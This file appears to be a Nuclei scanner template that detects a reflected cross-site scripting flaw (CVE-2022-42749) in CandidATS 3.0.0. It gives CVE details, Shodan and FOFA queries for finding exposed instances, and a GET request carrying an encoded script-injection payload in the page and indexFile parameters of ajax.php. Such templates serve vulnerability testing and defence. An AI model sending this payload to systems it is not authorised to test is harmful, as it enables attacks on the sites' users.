nuclei-templates/http/cves/2022/CVE-2022-42749.yaml

61 lines
2.4 KiB
YAML

id: CVE-2022-42749
info:
name: CandidATS 3.0.0 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement.
remediation: |
To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS.
reference:
- https://fluidattacks.com/advisories/modestep/
- https://fluidattacks.com/advisories/jcole/
- https://candidats.net/
- https://nvd.nist.gov/vuln/detail/CVE-2022-42749
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-42749
cwe-id: CWE-79
epss-score: 0.00111
epss-percentile: 0.44292
cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: auieo
product: candidats
shodan-query:
- http.html:"CandidATS"
- http.html:"candidats"
fofa-query: body="candidats"
tags: cve,cve2022,candidats,xss,auieo
http:
- method: GET
path:
- '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'candidat'
condition: and
- type: word
part: header
words:
- text/html
condition: and
- type: status
status:
- 404
# digest: 4a0a004730450220531c0aa7c99e8b788d4e306d09cefbbe38664468e7307be31dbffc11d1242f850221009578f9e5d962f0472ae830419e30be1853e6de85f97ecc54fea55b75452fc8f1:922c64590222798bb761d5b6d8e72950